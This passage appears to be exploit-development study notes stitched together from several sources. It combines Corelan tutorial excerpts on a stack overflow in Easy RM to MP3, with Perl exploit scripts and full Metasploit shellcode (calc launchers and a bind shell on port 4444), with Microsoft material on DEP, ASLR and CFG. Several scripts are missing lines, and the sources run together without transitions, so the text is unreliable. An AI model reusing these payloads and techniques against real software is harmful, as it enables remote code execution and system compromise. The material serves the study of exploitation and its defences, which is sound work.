"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
open($FILE,">$file");
close($FILE);
First, turn off the autopopup registry setting to prevent the debugger from taking over. Create
the m3u file, open it and watch the application die (and calc should be opened as well).
You could create other shellcode and replace the “launch calc” shellcode with your new
shellcode, but this code may not run well because the shellcode may be bigger, memory
locations may be different, and longer shellcode increases the risk on invalid characters in the
shellcode, which need to be filtered out.
Let’s say we want the exploit bind to a port so a remote hacker could connect and get a
command line.
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
"\x31\xc9\xbf\xd3\xc0\x5c\x46\xdb\xc0\xd9\x74\x24\xf4\x5d" .
"\xb1\x50\x83\xed\xfc\x31\x7d\x0d\x03\x7d\xde\x22\xa9\xba" .
"\x8a\x49\x1f\xab\xb3\x71\x5f\xd4\x23\x05\xcc\x0f\x87\x92" .
"\x48\x6c\x4c\xd8\x57\xf4\x53\xce\xd3\x4b\x4b\x9b\xbb\x73" .
"\x6a\x70\x0a\xff\x58\x0d\x8c\x11\x91\xd1\x16\x41\x55\x11" .
"\x5c\x9d\x94\x58\x90\xa0\xd4\xb6\x5f\x99\x8c\x6c\x88\xab" .
"\xc9\xe6\x97\x77\x10\x12\x41\xf3\x1e\xaf\x05\x5c\x02\x2e" .
"\xf1\x60\x16\xbb\x8c\x0b\x42\xa7\xef\x10\xbb\x0c\x8b\x1d" .
"\xf8\x82\xdf\x62\xf2\x69\xaf\x7e\xa7\xe5\x10\x77\xe9\x91" .
"\x1e\xc9\x1b\x8e\x4f\x29\xf5\x28\x23\xb3\x91\x87\xf1\x53" .
"\x16\x9b\xc7\xfc\x8c\xa4\xf8\x6b\xe7\xb6\x05\x50\xa7\xb7" .
"\x20\xf8\xce\xad\xab\x86\x3d\x25\x36\xdc\xd7\x34\xc9\x0e" .
"\x4f\xe0\x3c\x5a\x22\x45\xc0\x72\x6f\x39\x6d\x28\xdc\xfe" .
"\xc2\x8d\xb1\xff\x35\x77\x5d\x15\x05\x1e\xce\x9c\x88\x4a" .
"\x98\x3a\x50\x05\x9f\x14\x9a\x33\x75\x8b\x35\xe9\x76\x7b" .
"\xdd\xb5\x25\x52\xf7\xe1\xca\x7d\x54\x5b\xcb\x52\x33\x86" .
"\x7a\xd5\x8d\x1f\x83\x0f\x5d\xf4\x2f\xe5\xa1\x24\x5c\x6d" .
"\xb9\xbc\xa4\x17\x12\xc0\xfe\xbd\x63\xee\x98\x57\xf8\x69" .
"\x0c\xcb\x6d\xff\x29\x61\x3e\xa6\x98\xba\x37\xbf\xb0\x06" .
"\xc1\xa2\x75\x47\x22\x88\x8b\x05\xe8\x33\x31\xa6\x61\x46" .
"\xcf\x8e\x2e\xf2\x84\x87\x42\xfb\x69\x41\x5c\x76\xc9\x91" .
"\x74\x22\x86\x3f\x28\x84\x79\xaa\xcb\x77\x28\x7f\x9d\x88" .
"\x1a\x17\xb0\xae\x9f\x26\x99\xaf\x49\xdc\xe1\xaf\x42\xde" .
"\xce\xdb\xfb\xdc\x6c\x1f\x67\xe2\xa5\xf2\x98\xcc\x22\x03" .
"\xec\xe9\xed\xb0\x0f\x27\xee\xe7";
As you can see, this shellcode is 344 bytes long (and launching calc only took 144 bytes).
If you just copy&paste this shellcode, you may see that the vulnerable application does not
even crash anymore.
This – most likely – indicates either a problem with the shellcode buffer size (but you can test
the buffer size, you’ll notice that this is not the issue), or we are faced with invalid characters
in the shellcode. You can exclude invalid characters when building the shellcode with
metasploit, but you’ll have to know which characters are allowed and which aren’t. By default,
null bytes are restricted (because they will break the exploit for sure), but what are the other
characters ?
The m3u file probably should contain filenames. So a good start would be to filter out all
characters that are not allowed in filenames and filepaths. You could also restrict the character
set altogether by using another decoder. We have used shikata_ga_nai, but perhaps
alpha_upper will work better for filenames. Using another encoded will most likely increase
the shellcode length, but we have already seen (or we can simulate) that size is not a big issue.
Let’s try building a tcp shell bind, using the alpha_upper encoder. We’ll bind a shell to local
port 4444. The new shellcode is 703 bytes.
# http://www.metasploit.com
# Encoder: x86/alpha_upper
"\x89\xe1\xdb\xd4\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42" .
"\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b" .
"\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47" .
"\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a" .
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43" .
"\x31\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a" .
"\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44" .
"\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a" .
"\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a" .
"\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c" .
"\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a" .
"\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45" .
"\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50" .
"\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45" .
"\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c" .
"\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43" .
"\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43" .
<...>
"\x50\x41\x41";
Let’s use this shellcode. The new exploit looks like this : P.S. I have manually broken the
shellcode shown here. So if you copy & paste the exploit it will not work. But you should know
by now how to make a working exploit.
# http://www.corelan.be
#
my $file= "exploitrmtomp3.m3u";
# http://www.metasploit.com
# Encoder: x86/alpha_upper
$shellcode=$shellcode."\x89\xe1\xdb\xd4\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x00\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42" .
"\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b" .
"\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47" .
"\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a" .
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43" .
"\x31\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a" .
"\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44" .
"\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a" .
"\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a" .
"\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c" .
"\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a" .
"\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45" .
"\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50" .
"\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45" .
"\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c" .
"\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43" .
"\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43" .
"\x47\x43\x43\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50\x42" .
"\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48" .
"\x56\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x43" .
"\x38\x43\x32\x46\x35\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x42" .
"\x48\x48\x59\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48" .
"\x56\x46\x33\x46\x33\x46\x33\x50\x53\x50\x53\x50\x43\x51" .
"\x43\x51\x53\x46\x33\x4b\x4f\x4e\x30\x43\x56\x45\x38\x42" .
"\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4d\x31\x4a\x35\x42" .
"\x48\x4e\x44\x44\x5a\x44\x30\x49\x57\x50\x57\x4b\x4f\x48" .
"\x56\x43\x5a\x44\x50\x50\x51\x51\x45\x4b\x4f\x4e\x30\x43" .
"\x58\x49\x34\x4e\x4d\x46\x4e\x4b\x59\x50\x57\x4b\x4f\x4e" .
"\x36\x50\x53\x46\x35\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x50" .
"\x49\x4d\x56\x50\x49\x51\x47\x4b\x4f\x48\x56\x50\x50\x50" .
"\x54\x50\x54\x46\x35\x4b\x4f\x48\x50\x4a\x33\x45\x38\x4a" .
"\x47\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x48\x56\x50" .
"\x55\x4b\x4f\x48\x50\x42\x46\x42\x4a\x42\x44\x45\x36\x45" .
"\x38\x45\x33\x42\x4d\x4d\x59\x4b\x55\x42\x4a\x46\x30\x50" .
"\x59\x47\x59\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x50\x44\x4b" .
"\x39\x4b\x52\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x47" .
"\x32\x46\x4d\x4b\x4e\x51\x52\x46\x4c\x4d\x43\x4c\x4d\x42" .
"\x5a\x50\x38\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b" .
"\x4e\x4e\x53\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x49" .
"\x46\x51\x4b\x46\x37\x46\x32\x50\x51\x50\x51\x46\x31\x42" .
"\x4a\x45\x51\x46\x31\x46\x31\x51\x45\x50\x51\x4b\x4f\x48" .
"\x50\x43\x58\x4e\x4d\x4e\x39\x45\x55\x48\x4e\x51\x43\x4b" .
"\x4f\x49\x46\x43\x5a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x48" .
"\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43\x49\x54\x45\x34\x4b" .
"\x4f\x4e\x36\x50\x52\x4b\x4f\x48\x50\x43\x58\x4c\x30\x4c" .
"\x4a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x48\x56\x4b\x4f\x48" .
"\x50\x41\x41";
open($FILE,">$file");
close($FILE);
Create the m3u file, open it in the application. Easy RM to MP3 now seems to hang :
Trying 192.168.0.197...
Connected to 192.168.0.197.
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-
overflows/
We need to understand the protective mechanisms that make control of the EIP pointer more
difficult to obtain or exploit. While the Sync Breeze software was compiled without any of
these security mechanisms, we will be facing some of them in later modules. Microsoft
implements Data Execution Prevention (DEP),65 Address Space Layout Randomization
(ASLR),66 and Control Flow Guard (CFG). 67 DEP is a set of hardware and software
technologies that perform additional memory checks to help prevent malicious code from
running on a system. DEP helps prevent code execution from data pages68 by raising an
exception when attempts are made to do so. ASLR randomizes the base addresses of loaded
applications and DLLs every time the operating system is booted. On older Windows operating
systems, like Windows XP where ASLR is not implemented, all DLLs are loaded at the same
memory address every time, which makes exploitation easier. When coupled with DEP, ASLR
provides a very strong mitigation against exploitation. Finally, CFG is Microsoft’s
implementation of control-flow integrity. This mechanism performs validation of indirect code
branching such as a call instruction that uses a register as an operand rather than a memory
address such as CALL EAX. The purpose of this mitigation is to prevent the overwrite of
function pointers in exploits. As previously mentioned, Sync Breeze was compiled without any
of these security mechanisms, making the exploitation process much easier. This provides a
great opportunity for us to start learning the exploitation process without having to worry
about various mitigations. 2. Controlling EIP Gaining control of the EIP register is a crucial step
while exploiting memory corruption vulnerabilities. We can use the EIP register to control the
direction or flow of the application. However, right now we only know that a section of our
buffer of A’s overwrote the EIP. Before we can load a valid destination address into the EIP and
control the execution flow, we need to know which part of our buffer is landing in EIP.
DEP prevents code from being run from data pages such as the default heap, stacks, and
memory pools. If an application attempts to run code from a data page that is protected, a
memory access violation exception occurs, and if the exception is not handled, the calling
process is terminated.
If an application attempts to run code from a protected page, the application receives an
exception with the status code STATUS_ACCESS_VIOLATION. If your application must run code
from a memory page, it must allocate and set the proper virtual memory protection attributes.
The allocated memory must be
marked PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE,
or PAGE_EXECUTE_WRITECOPY when allocating memory. Heap allocations made by calling
the malloc and HeapAlloc functions are non-executable.
Applications cannot run code from the default process heap or the stack.
DEP is configured at system boot according to the no-execute page protection policy setting in
the boot configuration data. An application can get the current policy setting by calling
the GetSystemDEPPolicy function. Depending on the policy setting, an application can change
the DEP setting for the current process by calling the SetProcessDEPPolicy function.
Programming Considerations
An application can use the VirtualAlloc function to allocate executable memory with the
appropriate memory protection options. It is suggested that an application set, at a minimum,
the PAGE_EXECUTE memory protection option. After the executable code is generated, it is
recommended that the application set memory protections to disallow write access to the
allocated memory. Applications can disallow write access to allocated memory by using
the VirtualProtect function. Disallowing write access ensures maximum protection for
executable regions of process address space. You should attempt to create applications that
use the smallest executable address space possible, which minimizes the amount of memory
that is exposed to memory exploitation.
You should also attempt to control the layout of your application's virtual memory and create
executable regions. These executable regions should be located in a lower memory space than
non-executable regions. By locating executable regions below non-executable regions, you can
help prevent a buffer overflow from overflowing into the executable area of memory.
Application Compatibility
Some application functionality is incompatible with DEP. Applications that perform dynamic
code generation (such as Just-In-Time code generation) and do not explicitly mark generated
code with execute permission may have compatibility issues on computers that are using DEP.
Applications written to the Active Template Library (ATL) version 7.1 and earlier can attempt to
execute code on pages marked as non-executable, which triggers an NX fault and terminates
the application; for more information, see SetProcessDEPPolicy. Most applications that
perform actions incompatible with DEP must be updated to function properly.
A small number of executable files and libraries may contain executable code in the data
section of an image file. In some cases, applications may place small segments of code
(commonly referred to as thunks) in the data sections. However, DEP marks sections of the
image file that is loaded in memory as non-executable unless the section has the executable
attribute applied.
Therefore, executable code in data sections should be migrated to a code section, or the data
section that contains the executable code should be explicitly marked as executable. The
executable attribute, IMAGE_SCN_MEM_EXECUTE, should be added to
the Characteristics field of the corresponding section header for sections that contain
executable code. For more information about adding attributes to a section, see the
documentation included with your linker.
So what is ASLR? In short, when you boot a Windows Vista Beta 2 computer, we load system
code into different locations in memory. This helps defeat a well-understood attack called
“return-to-libc”, where exploit code attempts to call a system function, such as the socket()
function in wsock32.dll to open a socket, or LoadLibrary in kernel32.dll to load wsock32.dll in
the first place. The job of ASLR is to move these function entry points around in memory so
they are in unpredictable locations. In the case of Windows Vista Beta 2, a DLL or EXE could be
loaded into any of 256 locations, which means an attacker has a 1/256 chance of getting the
address right. In short, this makes it harder for exploits to work correctly.
• wsock32.dll (0x73ad0000)
• winhttp.dll (0x74020000)
• user32.dll (0x779b0000)
• kernel32.dll (0x77c10000)
• gdi32.dll (0x77a50000)
• wsock32.dll (0x73200000)
• winhttp.dll (0x73760000)
• user32.dll (0x770f0000)
• kernel32.dll (0x77350000)
• gdi32.dll (0x77190000)
As you can see, various DLLs are loaded at different addresses and this makes it harder for
exploit code to locate and therefore take advantage of functionality inside these DLLs. Not
impossible, just harder.
What really raises the bar however, is the combination of various defenses we now have in
Windows Vista, including:
/GS
This is a compile-time option in Visual C++ (on by default) that adds stack-based buffer overrun
detection. It also juggles around some of the function arguments and the function stack
variable to make some classes of attack harder to pull off. Virtually all Windows Vista binaries
are compiled with this, and we are now in our fourth iteration of /GS!
/SafeSEH
This is a linker option that writes the addresses of exception handlers to the PE header of the
executable, and when an exception is raised, the OS checks the exception handler address
against the list in the PE header, and if the address is not in the list, something corrupted the
exception handler address so the OS kills the process.
This requires CPU as well as operating system support. Most (read: all) buffer overruns come
into a vulnerable application as data, and then that data is executed. NX can prevent the
exploit working by marking data segments as No-Execute, in other words, you can’t run data.
When the WMF flaw was found, I wrote a small malicious WMF file that popped, “oops!” on
the desktop. When I ran this on my computer at home, an AMD 64FX based computer that
supports NX, Windows shut the image viewer down when I read my WMF file because the
operating system detected an attempt to run data.
Function Pointer Obfuscation
Long-lived function pointers are targets for attack because (a) they are long lived (!) and (b)
they point to functions that are called at some point by the code. In Windows Vista we encode
numerous long-lived pointers, and only un-encode them when the pointer is needed. You can
read more about this functionality in a prior blog post “Protecting against Pointer Subterfuge
(Kinda!)”
Summary
The net of this is ASLR is seen as just another defense, and it’s on by default in Windows Vista
Beta 2. I think the latter point is important, we added ASLR pretty late in the game, but we
decided that adding it to beta 2 and enabling it by default was important so we can understand
how well it performs in the field. By this I mean what the compatibility implications are, and to
give us time to fine tune ASLR before we finally release Windows Vista.
I’ll write more about ASLR and some other defenses in the coming weeks. Please let us know
what you think.
Control Flow Guard (CFG) is a highly-optimized platform security feature that was created to
combat memory corruption vulnerabilities. By placing tight restrictions on where an
application can execute code from, it makes it much harder for exploits to execute arbitrary
code through vulnerabilities such as buffer overflows. CFG extends previous exploit mitigation
technologies such as /GS, DEP, and ASLR.
This feature is available in Microsoft Visual Studio 2015, and runs on "CFG-Aware" versions of
Windows—the x86 and x64 releases for Desktop and Server of Windows 10 and Windows 8.1
Update (KB3000850).
We strongly encourage developers to enable CFG for their applications. You don't have to
enable CFG for every part of your code, as a mixture of CFG enabled and non-CFG enabled
code will execute fine. But failing to enable CFG for all code can open gaps in the protection.
Furthermore, CFG enabled code works fine on "CFG-Unaware" versions of Windows and is
therefore fully compatible with them.
In most cases, there is no need to change source code. All you have to do is add an option to
your Visual Studio 2015 project, and the compiler and linker will enable CFG.
The simplest method is to navigate to Project | Properties | Configuration Properties | C/C++
| Code Generation and choose Yes (/guard:cf) for Control Flow Guard.
If you are building your project from the command line, you can add the same options. For
example, if you are compiling a project called test.cpp, use cl /guard:cf test.cpp /link
/guard:cf.
You also have the option of dynamically controlling the set of icall target addresses that are
considered valid by CFG using the SetProcessValidCallTargets from the Memory Management
API. The same API can be used to specify whether pages are invalid or valid targets for CFG.
The VirtualProtect and VirtualAlloc functions will by default treat a specified region of
executable and committed pages as valid indirect call targets. It is possible to override this
behavior, such as when implementing a Just-in-Time compiler, by
specifying PAGE_TARGETS_INVALID when
calling VirtualAlloc or PAGE_TARGETS_NO_UPDATE when calling VirtualProtect as detailed
under Memory Protection Constants.
Run the dumpbin tool (included in the Visual Studio 2015 installation) from the Visual Studio
command prompt with the /headers and /loadconfig options: dumpbin /headers /loadconfig
test.exe. The output for a binary under CFG should show that the header values include
"Guard", and that the load config values include "CF Instrumented" and "FID table present".
How Does CFG Really Work?
Software vulnerabilities are often exploited by providing unlikely, unusual, or extreme data to
a running program. For example, an attacker can exploit a buffer overflow vulnerability by
providing more input to a program than expected, thereby over-running the area reserved by
the program to hold a response. This could corrupt adjacent memory that may hold a function
pointer. When the program calls through this function it may then jump to an unintended
location specified by the attacker.
However, a potent combination of compile and run-time support from CFG implements
control flow integrity that tightly restricts where indirect call instructions can execute.
2. Identifies the set of functions in the application that are valid targets for indirect calls.
2. Implements the logic that verifies that an indirect call target is valid.
To illustrate:
When a CFG check fails at runtime, Windows immediately terminates the program, thus
breaking any exploit that attempts to indirectly call an invalid address.
Note : This tutorial heavily builds on part 1 of the tutorial series, so please take the time to
fully read and understand part 1 before reading part 2.
The fact that we could use “jmp esp” was an almost perfect scenario. It’s not that ‘easy’ every
time. Today I’ll talk about some other ways to execute/jump to shellcode, and finally about
what your options are if you are faced with small buffer sizes.
• jump (or call) a register that points to the shellcode. With this technique, you basically
use a register that contains the address where the shellcode resides and put that
address in EIP. You try to find the opcode of a “jump” or “call” to that register in one of
the dll’s that is loaded when the application runs. When crafting your payload, instead
of overwriting EIP with an address in memory, you need to overwrite EIP with the
address of the “jump to the register”. Of course, this only works if one of the available
registers contains an address that points to the shellcode. This is how we managed to
get our exploit to work in part 1, so I’m not going to discuss this technique in this post
anymore.
• pop return : If none of the registers point directly to the shellcode, but you can see an
address on the stack (first, second, … address on the stack) that points to the
shellcode, then you can load that value into EIP by first putting a pointer to pop ret, or
pop pop ret, or pop pop pop ret (all depending on the location of where the address is
found on the stack) into EIP.
• push return : this method is only slightly different than the “call register” technique. If
you cannot find a or opcode anywhere, you could simply put the address on the stack
and then do a ret. So you basically try to find a push , followed by a ret. Find the
opcode for this sequence, find an address that performs this sequence, and overwrite
EIP with this address.
• jmp [reg + offset] : If there is a register that points to the buffer containing the
shellcode, but it does not point at the beginning of the shellcode, you can also try to
find an instruction in one of the OS or application dll’s, which will add the required
bytes to the register and then jumps to the register. I’ll refer to this method as jmp
[reg]+[offset]
• blind return : in my previous post I have explained that ESP points to the current stack
position (by definition). A RET instruction will ‘pop’ the last value (4bytes) from the
stack and will put that address in ESP. So if you overwrite EIP with the address that will
perform a RET instruction, you will load the value stored at ESP into EIP.
• If you are faced with the fact that the available space in the buffer (after the EIP
overwrite) is limited, but you have plenty of space before overwriting EIP, then you
could use jump code in the smaller buffer to jump to the main shellcode in the first
part of the buffer.
• SEH : Every application has a default exception handler which is provided for by the
OS. So even if the application itself does not use exception handling, you can try to
overwrite the SEH handler with your own address and make it jump to your shellcode.
Using SEH can make an exploit more reliable on various windows platforms, but it
requires some more explanation before you can start abusing the SEH to write
exploits. The idea behind this is that if you build an exploit that does not work on a
given OS, then the payload might just crash the application (and trigger an exception).
So if you can combine a “regular” exploit with a seh based exploit, then you have build
a more reliable exploit. Anyways, the next part of the exploit writing tutorial series
(part 3) will deal with SEH. Just remember that a typical stack based overflow, where
you overwrite EIP, could potentionally be subject to a SEH based exploit technique as
well, giving you more stability, a larger buffer size (and overwriting EIP would trigger
SEH… so it’s a win win)
The techniques explained in this document are just examples. The goal of this post is to
explain to you that there may be various ways to jump to your shellcode, and in other cases
there may be only one (and may require a combination of techniques) to get your arbitrary
code to run.
There may be many more methods to get an exploit to work and to work reliably, but if you
master the ones listed here, and if you use your common sense, you can find a way around
most issues when trying to make an exploit jump to your shellcode. Even if a technique seems
to be working, but the shellcode doesn’t want to run, you can still play with shellcode
encoders, move shellcode a little bit further and put some NOP’s before the shellcode… these
are all things that may help making your exploit work.
Of course, it is perfectly possible that a vulnerability only leads to a crash, and can never be
exploited.
Let’s have a look at the practical implementation of some of the techniques listed above.
call [reg]
If a register is loaded with an address that directly points at the shellcode, then you can do a
call [reg] to jump directly to the shellcode. In other words, if ESP directly points at the
shellcode (so the first byte of ESP is the first byte of your shellcode), then you can overwrite
EIP with the address of “call esp”, and the shellcode will be executed. This works with all
registers and is quite popular because kernel32.dll contains a lot of call [reg] addresses.
Quick example : assuming that ESP points to the shellcode : First, look for an address that
contains the ‘call esp’ opcode. We’ll use findjmp :
Findjmp2, Hat-Squad
Finished Scanning kernel32.dll for code useable with the esp register
From the Easy RM to MP3 example in the first part of this tutorial series, we know that we can
point ESP at the beginning of our shellcode by adding 4 characters between the place where
EIP is overwritten and ESP. A typical exploit would then look like this :
my $file= "test1.m3u";
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" .
"\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" .
"\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" .
"\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" .
"\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" .
"\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" .
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" .
"\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" .
"\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" .
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" .
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" .
"\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" .
"\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" .
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" .
"\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" .
"\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" .
"\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" .
"\x31\x42\x4c\x42\x43\x45\x50\x41\x41";
open($FILE,">$file");
close($FILE);
pwned !
pop ret
As explained above, In the Easy RM to MP3 example, we have been able to tweak our buffer so
ESP pointed directly at our shellcode. What if there is not a single register that points to the
shellcode ?
Well, in this case, an address pointing to the shellcode may be on the stack. If you dump esp,
look at the first addresses. If one of these addresses points to your shellcode (or a buffer you
control), then you can find a pop ret or pop pop ret (nothing to do with SEH based exploits
here) to
The pop ret technique obviously is only usabled when ESP+offset already contains an address
which points to the shellcode… So dump esp, see if one of the first addresses points to the
shellcode, and put a reference to pop ret (or pop pop ret or pop pop pop ret) into EIP. This will
take some address from the stack (one address for each pop) and will then put the next
address into EIP. If that one points to the shellcode, then you win.
There is a second use for pop ret : what if you control EIP, no register points to the shellcode,
but your shellcode can be found at ESP+8. In that case, you can put a pop pop ret into EIP,
which will jump to ESP+8. If you put a pointer to jmp esp at that location, then it will jump to
the shellcode that sits right after the jmp esp pointer.
Let’s build a test case. We know that we need 26094 bytes before overwriting EIP, and that we
need 4 more bytes before we are at the stack address where ESP points at (in my case, this is
0x000ff730).
We will simulate that at ESP+8, we have an address that points to the shellcode. (in fact, we’ll
just put the shellcode behind it – again, this is just a test case).
26094 A’s, 4 XXXX’s (to end up where ESP points at), then a break, 7 NOP’s, a break, and more
NOP’s. Let’s pretend the shellcode begins at the second break. The goal is to make a jump
over the first break, right to the second break (which is at ESP+8 bytes = 0x000ff738).
my $file= "test1.m3u";
open($FILE,">$file");
close($FILE);
Application crashed because of the buffer overflow. We’ve overwritten EIP with “BBBB”. ESP
points at 000ff730 (which starts with the first break), then 7 NOP’s, and then we see the
second break, which really is the begin of our shellcode (and sits at address 0x000ff738).
+0x42424231:
42424242 ?? ???
0:000> d esp
0:000> d 000ff738
The goal is to get the value of ESP+8 into EIP (and to craft this value so it jumps to the
shellcode). We’ll use the pop ret technique + address of jmp esp to accomplish this.
One POP instruction will take 4 bytes off the top of the stack. So the stack pointer would then
point at 000ff734. Running another pop instruction would take 4 more bytes off the top of the
stack. ESP would then point to 000ff738. When we a “ret” instruction is performed, the value
at the current address of ESP is put in EIP. So if the value at 000ff738 contains the address of a
jmp esp instruction, then that is what EIP would do. The buffer after 000ff738 must then
contains our shellcode.
We need to find the pop,pop,ret instruction sequence somewhere, and overwrite EIP with the
address of the first part of the instruction sequence, and we must set ESP+8 to the address of
jmp esp, followed by the shellcode itself.
First of all, we need to know the opcode for pop pop ret. We’ll use the assemble functionality
in windbg to get the opcodes :
0:000> a
pop eax
pop ebp
7c901210 ret
ret
7c901211
0:000> u 7c90120e
ntdll!DbgBreakPoint:
7c901210 c3 ret
7c901213 c3 ret
7c90121a cc int 3
Of course, you can pop to other registers as well. These are some other available pop opcodes
:
pop eax 58
pop ebx 5b
pop ecx 59
pop edx 5a
pop esi 5e
pop ebp 5d
Now we need to find this sequence in one of the available dll’s. In part 1 of the tutorial we
have spoken about application dll’s versus OS dll’s. I guess it’s recommended to use application
